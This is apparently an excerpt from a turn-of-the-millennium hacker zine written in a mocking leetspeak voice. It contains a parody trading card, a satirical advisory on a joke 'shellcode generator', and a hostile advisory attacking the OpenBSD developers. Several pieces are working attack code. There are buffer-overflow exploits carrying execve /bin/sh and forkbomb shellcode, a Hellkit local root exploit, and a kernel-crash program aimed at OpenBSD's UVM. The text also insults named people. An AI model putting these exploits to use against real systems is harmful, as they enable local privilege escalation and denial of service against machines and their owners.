+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Special powerz: c4n basic4lly get any k0de he wrote an auto- |
|> mated c0de begg1ng scr1pt (b4sic4lly what eye am trying 2 say|
|> iz -> Y0UR W4R3Z _IZ_NOT_S4F3_), h3z a .uk g4ngmembr (armed |
|> w1th batt0n WaReZ), carriez h1s k0deSurviv0r t00lk1t wherevr |
|> he g0ez (arm3d w1th batt0n and c0deZ), wh3n he enc0unterz u |
|> in pers0n (at a CON) he we4rz h1z neuroWaReZ goggl3z which |
|> f0rc3 u t0 h4nd 0vr your fl0ppy d1ske3tteZ, he bu1lt the |
|> f1rst m4ss b0dy orrifice sc4nr for when u trY t0 h1de ur |
|> WaReZ fr0m h1m, h3 1z arm3d w1th the l4t3st 0d4y b3c0z n0w he|
|> 1z a p4yed h4kr (penetration tezter @ burger k1ng), one l4zt |
|> word -> th1s gUy iz very d4nger0uZ |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Famous line: -> |
|> "h4y br0 g0t anY 0d4y WAreZ??" |
|> "C4n u hUKe up ur 0ld budy w1th s0me -1d4y WArEZ ?????" |
|> "c0m3 on br0 g1mme s0me fuqn k0d3z" |
|> "du0de, wtf d0 i h4vet0 d0, suq ur k0q irl 4 waRREEz?" |
|> "COME ON M4N U K4N HUKE ME UP W1TH W4R3Z I D0NT DISTR0" |
|> "ill tr4de u tonz of rootshell waReZ 4 one 0day warEZ." |
|> "LoL :) stop pl4yin, oh wait holdup, i g0t dcc autoget on" |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Charactoristics: |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| (w0rk1n) %%%%% <- j4rry kurl m0h4wk (eLitE in .uk) |
+ %%%%% +
| ^(WAREZ) (warez)^ <- h1z neuroWaReZ g0ggl3z (uze flaq) |
+ [v^WAREZ^v] <- h3 sw4ll0wZ wAAAArEZ whole @!#!@ +
| # <- sk4thed fr0m "WaReZ surv1v0r" the |
+ m4de 4 ZDTV m0vie +
| (normal) %%%%% |
+ %%%%% <- j3rry kurl h4wk +
| ^( O ) ( O )^ <- n0te h1z neuroWaReZ g0ggl3z r off |
+ [v^v^v^v^v] <- n0tice hez WarEzivourous -Eatz WaREz+
| # <- the sk4the (lyke cr4wf0rz m0le) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[END_CUT] so1o
[CUT_HERE] skel
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Handle(s): | Affiliations: |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Contributions: |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Special powerz: |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Famous line: |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Charactoristics: |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| p1c |
+ +
| |
+ +
| |
+ +
| |
+ +
| |
+ +
| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[END_CUT] skel
[END_DIR] lt
___________________________
.-' `-.
[05]| a w4lk d0wn mem0ry l4me |[05]
[05]| by: |[05]
[05]| Team Sploit |[05]
`-.___________________________.-'
The reason we are reposting this is because, well, we are
fed the hell up at lamers biting our style. Here we include
the original shellgen.c and shellgen advisory + exploit. Then,
we include the lame ass attempt to bite TeamSploit's style by
Scrippie and Team b0f. They wrote a lame as hell exploit for
the wonderful hellkit. FUCK OFF LAMERS.
[BEGIN_DIR] shellgen
[CUT_HERE] shellgen.c
/* shellcode generator
by Mixter
PRIVATE - DO NOT DISTRIBUTE!
*/
char *welk=
"\x20\x20\x20\x20\x20\x20\x20\x2f\x5c\x0a\x20\x20\x20\x20\x20\x20\x7b\x2e"
"\x2d\x7d\x0a\x20\x20\x20\x20\x20\x3b\x5f\x2e\x2d\x27\x5c\x0a\x20\x20\x20"
"\x20\x7b\x20\x20\x20\x20\x5f\x2e\x7d\x5f\x0a\x20\x20\x20\x20\x20\x5c\x2e"
"\x2d\x27\x20\x2f\x20\x20\x60\x2c\x0a\x20\x20\x20\x20\x20\x20\x5c\x20\x20"
"\x7c\x20\x20\x20\x20\x2f\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x7c\x20"
"\x20\x2c\x2f\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x5c\x7c\x5f\x2f\x0a";
char *ark=
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x2d\x2d\x2e\x5f"
"\x0a\x20\x20\x20\x20\x20\x20\x20\x2e\x27\x22\x22\x2e\x27\x2f\x7c\x5c\x60"
"\x2e\x22\x22\x27\x2e\x0a\x20\x20\x20\x20\x20\x20\x3a\x20\x20\x2e\x27\x20"
"\x2f\x20\x7c\x20\x5c\x20\x60\x2e\x20\x20\x3a\x0a\x20\x20\x20\x20\x20\x20"
"\x27\x2e\x27\x20\x20\x2f\x20\x20\x7c\x20\x20\x5c\x20\x20\x60\x2e\x27\x0a"
"\x20\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x2f\x20\x20\x20\x7c\x20\x20\x20"
"\x5c\x20\x2e\x27\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x20\x60\x2d\x2e\x5f"
"\x5f\x7c\x5f\x5f\x2e\x2d\x27\x0a";
char *clam=
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x2d\x2d\x2e\x5f"
"\x0a\x20\x20\x20\x20\x20\x20\x20\x2e\x3a\x22\x3a\x5f\x27\x2d\x2e\x2d\x60"
"\x5f\x3a\x22\x3a\x2e\x0a\x20\x20\x20\x20\x20\x20\x3a\x60\x2e\x60\x2e\x5f"
"\x27\x2d\x2e\x2d\x27\x5f\x2e\x27\x2e\x27\x3a\x0a\x20\x20\x20\x20\x20\x20"
"\x27\x60\x2e\x60\x2e\x5f\x60\x2d\x2e\x2d\x27\x5f\x2e\x27\x2e\x27\x27\x0a"
"\x20\x20\x20\x20\x20\x20\x20\x60\x2e\x60\x2d\x2e\x60\x2d\x2e\x2d\x27\x2e"
"\x2d\x27\x2e\x27\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x20\x60\x2e\x5f\x60"
"\x2d\x2e\x2d\x27\x5f\x2e\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x60\x27\x27\x27\x60\x0a";
char *scallop=
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x27\x27\x7c\x27"
"\x27\x2d\x2e\x5f\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x2e\x2d\x27\x20\x20"
"\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x60\x2d\x2e\x0a\x20\x20\x20\x20\x20"
"\x20\x2e\x27\x5c\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x20"
"\x20\x2f\x60\x2e\x0a\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x5c\x20\x20\x20"
"\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x2f\x20\x20\x20\x60\x2e\x0a\x20"
"\x20\x20\x20\x5c\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x20\x20\x7c\x20\x20"
"\x20\x20\x20\x2f\x20\x20\x20\x20\x20\x2f\x0a\x20\x20\x20\x20\x20\x60\x5c"
"\x20\x20\x20\x20\x5c\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x2f\x20\x20\x20"
"\x20\x2f\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x60\x5c\x20\x20\x20\x5c\x20"
"\x20\x20\x7c\x20\x20\x20\x2f\x20\x20\x20\x2f\x27\x0a\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x60\x5c\x20\x20\x5c\x20\x20\x7c\x20\x20\x2f\x20\x20\x2f"
"\x27\x0a\x20\x20\x20\x6a\x67\x73\x20\x20\x5f\x2e\x2d\x60\x5c\x20\x5c\x20"
"\x7c\x20\x2f\x20\x2f\x27\x2d\x2e\x5f\x0a\x20\x20\x20\x20\x20\x20\x20\x7b"
"\x5f\x5f\x5f\x5f\x5f\x60\x5c\x5c\x7c\x2f\x2f\x27\x5f\x5f\x5f\x5f\x5f\x7d";
void
main()
{
char buf[1024];
printf("Generate shell code for: (solaris/linux/bsd/win32)? ");
gets(buf);
printf("Generating shell code...\n");
if(strstr(buf,"solaris")) puts(welk);
if(strstr(buf,"linux")) puts(ark);
if(strstr(buf,"bsd")) puts(clam);
if(strstr(buf,"win32")) puts(scallop);
printf("done!\n");
}
[END_CUT] shellgen.c
[CUT_HERE] shellgen.c.adv
[TeamSploit Advisory]
[Begin PDP-11 SIGNED MESSAGE]
TeamSploit labs : http://el8.n3.net
Also check out our Security E-ZINE at http://el8.n3.net
Hello folks, this is TeamSploit (TM), we have noticed an overflow in
shellgen.c . Shellgen.c is an advanced shellcode generator, which is
widely used by the 'hacking-community'.
Shellgen.c can be found at 1337.tsx.org (Mixter Security *sigh*)
Problem:
Shellgen.c uses gets (which is very unsafe, so i've heard)
('ld: gets() is unsafe' errors!)
A malicious user may obtain SUPER_USER [1] privledges by using
the appended exploit. This is a multiplatform vulnerability.
If shellgen.c is run setuid root, a user may obtain root
privledges thus compromising a system.
Example:
TSlabs$ ./shellgen
Generate shell code for: (solaris/linux/bsd/win32)? 1million i's
Segmentation Fault, core dumped.
TSlabs$ rm shellgen ; reboot
Possible fixes:
Use the patch provided by TSlabs (TM).
Thurly remove shellgen.c and shellgen binaries from system.
TSlabs$ find / -name shellgen.c
DO NOT RUN SETUID ROOT!
Rewrite libc.
[1] SUPERUSER - GOD ACCESS - UID 0 - CAN RM -RF /
This has been a TeamSploit advisory, much respect due to:
gH (global hell), PERSUiT, f0rpaxe, Team HAckphreak ( and
hackphreak labs ), w00w00, ADM, !r00t, b4b0, www.antionline.com,
www.deathrowrecords.com.
[Appended actual program, possible patch.diff, and exploit]
PROGRAM:
/* shellcode generator
by Mixter
PRIVATE - DO NOT DISTRIBUTE!
*/
char *welk=
"\x20\x20\x20\x20\x20\x20\x20\x2f\x5c\x0a\x20\x20\x20\x20\x20\x20\x7b\x2e"
"\x2d\x7d\x0a\x20\x20\x20\x20\x20\x3b\x5f\x2e\x2d\x27\x5c\x0a\x20\x20\x20"
"\x20\x7b\x20\x20\x20\x20\x5f\x2e\x7d\x5f\x0a\x20\x20\x20\x20\x20\x5c\x2e"
"\x2d\x27\x20\x2f\x20\x20\x60\x2c\x0a\x20\x20\x20\x20\x20\x20\x5c\x20\x20"
"\x7c\x20\x20\x20\x20\x2f\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x7c\x20"
"\x20\x2c\x2f\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x5c\x7c\x5f\x2f\x0a";
char *ark=
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x2d\x2d\x2e\x5f"
"\x0a\x20\x20\x20\x20\x20\x20\x20\x2e\x27\x22\x22\x2e\x27\x2f\x7c\x5c\x60"
"\x2e\x22\x22\x27\x2e\x0a\x20\x20\x20\x20\x20\x20\x3a\x20\x20\x2e\x27\x20"
"\x2f\x20\x7c\x20\x5c\x20\x60\x2e\x20\x20\x3a\x0a\x20\x20\x20\x20\x20\x20"
"\x27\x2e\x27\x20\x20\x2f\x20\x20\x7c\x20\x20\x5c\x20\x20\x60\x2e\x27\x0a"
"\x20\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x2f\x20\x20\x20\x7c\x20\x20\x20"
"\x5c\x20\x2e\x27\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x20\x60\x2d\x2e\x5f"
"\x5f\x7c\x5f\x5f\x2e\x2d\x27\x0a";
char *clam=
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x2d\x2d\x2e\x5f"
"\x0a\x20\x20\x20\x20\x20\x20\x20\x2e\x3a\x22\x3a\x5f\x27\x2d\x2e\x2d\x60"
"\x5f\x3a\x22\x3a\x2e\x0a\x20\x20\x20\x20\x20\x20\x3a\x60\x2e\x60\x2e\x5f"
"\x27\x2d\x2e\x2d\x27\x5f\x2e\x27\x2e\x27\x3a\x0a\x20\x20\x20\x20\x20\x20"
"\x27\x60\x2e\x60\x2e\x5f\x60\x2d\x2e\x2d\x27\x5f\x2e\x27\x2e\x27\x27\x0a"
"\x20\x20\x20\x20\x20\x20\x20\x60\x2e\x60\x2d\x2e\x60\x2d\x2e\x2d\x27\x2e"
"\x2d\x27\x2e\x27\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x20\x60\x2e\x5f\x60"
"\x2d\x2e\x2d\x27\x5f\x2e\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x60\x27\x27\x27\x60\x0a";
char *scallop=
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x27\x27\x7c\x27"
"\x27\x2d\x2e\x5f\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x2e\x2d\x27\x20\x20"
"\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x60\x2d\x2e\x0a\x20\x20\x20\x20\x20"
"\x20\x2e\x27\x5c\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x20"
"\x20\x2f\x60\x2e\x0a\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x5c\x20\x20\x20"
"\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x2f\x20\x20\x20\x60\x2e\x0a\x20"
"\x20\x20\x20\x5c\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x20\x20\x7c\x20\x20"
"\x20\x20\x20\x2f\x20\x20\x20\x20\x20\x2f\x0a\x20\x20\x20\x20\x20\x60\x5c"
"\x20\x20\x20\x20\x5c\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x2f\x20\x20\x20"
"\x20\x2f\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x60\x5c\x20\x20\x20\x5c\x20"
"\x20\x20\x7c\x20\x20\x20\x2f\x20\x20\x20\x2f\x27\x0a\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x60\x5c\x20\x20\x5c\x20\x20\x7c\x20\x20\x2f\x20\x20\x2f"
"\x27\x0a\x20\x20\x20\x6a\x67\x73\x20\x20\x5f\x2e\x2d\x60\x5c\x20\x5c\x20"
"\x7c\x20\x2f\x20\x2f\x27\x2d\x2e\x5f\x0a\x20\x20\x20\x20\x20\x20\x20\x7b"
"\x5f\x5f\x5f\x5f\x5f\x60\x5c\x5c\x7c\x2f\x2f\x27\x5f\x5f\x5f\x5f\x5f\x7d";
void
main()
{
char buf[1024];
printf("Generate shell code for: (solaris/linux/bsd/win32)? ");
gets(buf);
printf("Generating shell code...\n");
if(strstr(buf,"solaris")) puts(welk);
if(strstr(buf,"linux")) puts(ark);
if(strstr(buf,"bsd")) puts(clam);
if(strstr(buf,"win32")) puts(scallop);
printf("done!\n");
}
PATCH:
TSlabs$ cat TeamSploit_shellgen.c.diff
--- shellgen.c Wed Dec 29 22:00:28 1999
+++ new.c Wed Dec 29 23:05:09 1999
@@ -54,7 +54,7 @@
{
char buf[1024];
printf("Generate shell code for: (solaris/linux/bsd/win32)? ");
-gets(buf);
+fgets(buf,80,stdin);
printf("Generating shell code...\n");
if(strstr(buf,"solaris")) puts(welk);
if(strstr(buf,"linux")) puts(ark);
TSlabs$
EXPLOIT:
--`cut here`--
/* * *
* This is a TeamSploit production
* exploit for shellgen.c ( please read the advisory attatched )
* ./shellgen_exp ...
* TeamSploit labs : http://el8.n3.net
* * */
#include <stdio.h>
#define THE_OFFSET_IS 256
#define THE_BUFFER_IS 1024
#define LEEWAY 8
unsigned char f00f_shellcode[] = { 0xF0, 0x0F };
unsigned char forkbomb_shellcode[] =
{ 0xb0, 0x02, 0xcd, 0x80, 0xeb, 0xfa };
unsigned char generic_shellcode[] = { 0x41 };
unsigned char sh_shellcode[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
unsigned char ls_shellcode[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/ls";
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void usage(void)
{
puts("./shellgen <shellcode_num> <program> <offset> (optional)");
puts("1 = f00f");
puts("2 = forkbomb");
puts("3 = generic");
puts("4 = shell");
puts("5 = ls");
exit(31337);
}
int main(int argc, char *argv[])
{
FILE *m1xt3r;
unsigned int c, offset;
char *prognam, tuff[THE_BUFFER_IS + LEEWAY];
unsigned long addr;
if (argc < 3) {
usage();
}
if (argc < 3) {
usage();
}
c = atoi(argv[1]);
switch (c) {
case 1:
puts("F00F SHELLCODE CHOSEN");
break;
case 2:
puts("FORKBOMB SHELLCODE CHOSEN (PREMIUM CHOICE)");
break;
case 3:
puts("GENERIC SHELLCODE (provided by gH thnx)");
break;
case 4:
puts("RUN A SHELL (good for when shellgen is +s root)");
break;
case 5:
puts("LS SHELLCODE (INCASE LS IS BACKDOORED)");
break;
default:
usage();
}
prognam = argv[2];
if (argc >= 4)
offset = atoi(argv[3]);
else
offset = THE_OFFSET_IS;
printf("ADDRESS = 0x%x, OFFSET = 0x%x\n", get_sp(), get_sp() + offset);
if ((m1xt3r = popen(prognam, "w")) == NULL) {
perror("p o p e n");
exit(0);
}
addr = get_sp();
if (c == 1) { /* f00f shellcode */
for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4)
*(unsigned long *) (tuff + c) = addr + offset;
memset(tuff, 0x90, THE_BUFFER_IS - strlen(f00f_shellcode));
memcpy(&tuff[THE_BUFFER_IS - strlen(f00f_shellcode)],
f00f_shellcode, strlen(f00f_shellcode));
*(tuff + THE_BUFFER_IS + LEEWAY) = 0;
}
else if (c == 2) {
for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4)
*(unsigned long *) (tuff + c) = addr + offset;
memset(tuff, 0x90, THE_BUFFER_IS - strlen(forkbomb_shellcode));
memcpy(&tuff[THE_BUFFER_IS - strlen(forkbomb_shellcode)],
forkbomb_shellcode, strlen(forkbomb_shellcode));
*(tuff + THE_BUFFER_IS + LEEWAY) = 0;
}
else if (c == 3) {
memset(tuff, generic_shellcode[0], sizeof(tuff));
}
else if (c == 4) {
for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4)
*(unsigned long *) (tuff + c) = addr + offset;
memset(tuff, 0x90, THE_BUFFER_IS - strlen(sh_shellcode));
memcpy(&tuff[THE_BUFFER_IS - strlen(sh_shellcode)],
sh_shellcode, strlen(sh_shellcode));
*(tuff + THE_BUFFER_IS + LEEWAY) = 0;
}
else if (c == 5) {
for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4)
*(unsigned long *) (tuff + c) = addr + offset;
memset(tuff, 0x90, THE_BUFFER_IS - strlen(ls_shellcode));
memcpy(&tuff[THE_BUFFER_IS - strlen(ls_shellcode)],
ls_shellcode, strlen(ls_shellcode));
*(tuff + THE_BUFFER_IS + LEEWAY) = 0;
} else
usage();
puts("Get ready, we are about to exploit shellgen, hold on tight");
fprintf(m1xt3r, "%s", tuff);
if (pclose(m1xt3r) < 0) {
perror("pclose");
exit(-1);
}
return 0;
}
[END_CUT] shellgen.c.adv
[CUT_HERE] hellex_LAMEASSFUCKS.c
/* hellex.c - Hellkit 1.2 local linux (x86) exploit by Narrow */
/* Greetz: Legion2000, buffer0verflow and Scrippie (of courz) */
/* Tue May 23 14:04:35 2000 - It doesn't suck much memonry ;-)*/
#include <stdio.h>
#include <string.h>
#define OFFSETS -500 // Red Hat 6.0
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
int main(int argc,char **argv)
{
char buf[973];
int offset;
if(argc < 2) { offset = OFFSETS; } else { offset = atoi(argv[1]); }
memset(buf,0x90,sizeof(buf));
memcpy(buf + sizeof(buf) - strlen(shellcode) - 8, shellcode, strlen(shellcode
));
*(long *)&buf[973 - 4] = get_sp() - offset;
execl("./driver", "drank-driver", buf);
}
[END_CUT] hellex_LAMEASSFUCKS.c
[END_DIR] shellgen
_______________________
.-' `-.
[06]| OpenBSD |[06]
[06]| by: |[06]
[06]| Team Hackphreak |[06]
`-._______________________.-'
Hello, it is Team Hackphreak again. Today, we will prove how
incompetant and lame these OpenBSD retards really are.
First, we start off with the original advisory which slammed
into bugtraq and packetstorm.
Then, we show you a funny email.
Next, we will analyze some irc logs which prove the OpenBSD
development team are total bafoons.
Finally, we will leave you with traderism (aka SSG claiming no
responsibility for the advisory).
Note to self, my comments will be in *** OBSDCMNT.
[BEGIN_DIR] OpenBSD
[CUT_HERE] hp2.adv
- HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % -
| |
| www.hackphreak.org |
| |
| Version : Hackphreak advisory #2 of many |
| Author : RLoxley[hackphreak / condemnation / EHAP / RSH / ZSH (soon)]|
| Contributed : All of Team Hackphreak (thanks alot) & SSG |
| Topic : A non-privledged user may crash an OpenBSD Operating System,|
| thus rendering the system useless. |
| Effected : All Operating Systems which use UVM (not MACH VM) |
| * OpenBSD |
| * NetBSD |
| Prvt Release : November 5th, 1998 |
| Released : November 5th, 2000 |
| Credits : www.hackphreak.org, zsh.interniq.org, www.subterrain.net |
| Check Section 1 |
| Vender status : Notified |
| |
- HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % -
Section 1 [Greets]:
First and foremost, thanks to team hackphreak and SSG, great job!
SSG helped during the researching of the bug (bind, aempire, cripto).
This was a coordinated effort with Team Hackphreak and The Hacker
Collective known as SSG.
I would like to thank RootShellHackers and Team ZSH for rigorously
testing on many freenets :] (ratcorpse and her great mass testing
scripts, great for analysis: www.sneakerz.org/~rat < great site :)
I would like to thank caddis of TESO. He started the whole OpenBSD
war. Keep up the good work.
Special thanks to Mixter and his TFN2k. It has made my job much
easier.
I would also like to thank: EHAP, Condemnation, gov-boi (hack.co.za),
shinex (yf0rce :), ISS, Solar Designer, #hackphreak, #darknet,
#!/bin/zsh, #condemnation, #conf, Al Hugher, Aleph1, and my parents.
Section 2 [Preface]:
Usually Team HackPhreak keeps our code and research quite private
until we give lectures in our channel on undernet (#hackphreak). But what
really annoys us, is when a very big figure in the security community acts
disrespectful to the people who help build this internet infastructure. This
person who I speak of, is Theo de Raadt. Theo de Raadt claims that OpenBSD
hasn't experienced a local root hole in the default install for many years.
During his internal security audits, they find many bugs, yet they just
hide them, patch them, and never notify the public. This is very unethical
on the part of the OpenBSD team. I think you guys are lame. What worrys
Team Hackphreak, is how many other bugs have gone unnoticed. We have found
many other exlpoitable holes in previous OpenBSD distributions, that have
miraculously been patched and never revealed. Next, there is the "Three
years without a remote hole in the default install". I hope this advisory
breaks that aswell, because, technically:
* Log into the remote host
* Grab our exploit
* Crash the kernel
This bug is also be exploitable via NFS.
Three years without a remote hole? Strike that.
Section 3 [Background]:
UVM is a new virtual memory system developed which is currently
used in the OpenBSD Operating Systems. It is significantly better than the
traditional MACH based VM.
Section 4 [Problem Description]:
There exists a bug in the UVM code which has blatently slipped passed
the seemlessly small minded OpenBSD security auditors. The bug exists in the
anonymous mapping code in UVM. This bug allows for any local user (or remote
user) to crash the entire OpenBSD system, rendering it completely useless.
Once the system has crashed, a local user (with access to the terminal) may
in fact hack the system. The system drops into DDB (man it). DDB allows for
debugging of the actual kernel. When one has access to the kernel, they can
do most anything: such as reading disk buffers, reading _copyright, reading
network mbuf's. So this scales to a most incredible attack, not just a DoS
(if you have read through this you have now more reason to switch to Linux).
A very smart attacker will:
* Crash the kernel
* Assume the location of the box which crashed (@ the colo)
* Use DDB to gain god status
A layout of the crash dump is given:
* trap()
* uvm_fault()
* uvmfault_amapcopy()
* amap_copy()
* amap_alloc()
------------------------------------------------------------------
struct vm_amap *
amap_alloc(sz, padsz, waitf)
vaddr_t sz, padsz;
int waitf;
/*
* amap_alloc: allocate an amap to manage "sz" bytes of anonymous VM
*
* => caller should ensure sz is a multiple of PAGE_SIZE
* => reference count to new amap is set to one
* => new amap is returned unlocked
*/
{
struct vm_amap *amap;
int slots, padslots;
UVMHIST_FUNC("amap_alloc"); UVMHIST_CALLED(maphist);
AMAP_B2SLOT(slots, sz); /* load slots */
AMAP_B2SLOT(padslots, padsz);
------------------------------------------------------------------
The kernel crashes in the first instance of AMAP_B2SLOT(slots, sz).
------------------------------------------------------------------
#define AMAP_B2SLOT(S,B) { \
if ((B) & (PAGE_SIZE - 1)) \
panic("AMAP_B2SLOT: invalid byte count"); \
(S) = (B) >> PAGE_SHIFT; \
}
------------------------------------------------------------------
Basically, if the (sz & (PAGE_SIZE-1)) is true, the kernel
panic()'s. Not so cool Mr. Theo, my grandmother wouldn't even have
done something so stupid and all she has is an A+ and CCNA!
As aempirei, bind, and cripto pointed out: Even if AMAP_B2SLOT()
is patched, the bug will still exist, hence forth because later
on down the yellow brick road, the kernel will crash in routines such as:
* amap_splitref()
* amap_lookup()
So a hacker will still be able to obtain root access. No thanks
to obecian for notifying Theo a wee bit early.
Section 4 [The exploit]:
// PUBLIC RELEASE
//
// krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG
//
// This exploit is proof of concept code. It exploits the UVM bug in
// all OpenBSD kernels. It can also be used to gain god access via
// ddb during the crash recovery phase of OpenBSD's security structure.
//
// Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP,
// Condemnation, caddis[TESO], Solar Designer, gov-boi,
// #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting)
// SSG, www.subterrain.net
//
// PS: The exploit is broke very slightly, so this takes some knowledge ;)
//
// PUBLIC RELEASE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <a.out.h>
#include <fcntl.h>
#include <sys/types.h>
#define CRASH_FILE "./f0rKb0mB"
extern int errno;
int
main(int argc, char *argv[])
{
struct exec *ehdr;
struct stat statbuf;
int fd;
unsigned char *data;
fd = open(argv[0], O_RDONLY);
if (fd < 0)
{
perror("main() : open(argv[0]) ");
exit(-1);
}
if (fstat(fd, &statbuf) < 0)
{
perror("main() : fstat() ");
exit(-1);
}
data = (unsigned char *) malloc(statbuf.st_size);
if (data == NULL)
{
perror("main() : malloc() ");
exit(-1);
}
if (read(fd, data, statbuf.st_size) <= 0)
{
puts("main() : read() Failure");
exit(-1);
}
ehdr = (struct exec *) data;
close(fd);
unlink(CRASH_FILE);
fd = open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR);
if (fd < 0)
{
perror("main() : open(CRASH_FILE) ");
exit(-1);
}
ehdr->a_data += 3;
if (write(fd, data, statbuf.st_size) < 0)
{
perror("main() : write() ");
exit(-1);
}
close(fd);
if (execlp(CRASH_FILE, NULL) < 0)
{
perror("main() : execlp() ");
exit(-1);
}
return (0);
}
Section 5 [TO HELL WITH YOU'S]:
Theo de Raadt and the OpenBSD Team
Paedophiles
Rascists
All of #kkk on undernet
All of the people who disturb my channel
BoW
frys / prophet
b0g
Scriptkiddies all over the place
obecian
Section 6 [Come 1 Come ALL]:
Team Hackphreak invites you to undernet #hackphreak for a great
learning experience. Just join us to teach and learn. But remember,
HARASSMENT = BAN. www.hackphreak.org/newbie.
Section 7 [Lies]:
I hope this advisory brings you closer to NT / Linux, rather than
OpenBSD. Linux & NT are way better anyway.
[END_CUT] hp2.adv
[CUT_HERE] funny_eMale
From: "Condemned.org" <rloxley@condemned.org>
To: "John Kerbawy" <john@maKintosh.com>
References: <20001105173302.A27901@maKintosh.com>
Subject: Re: webpage.
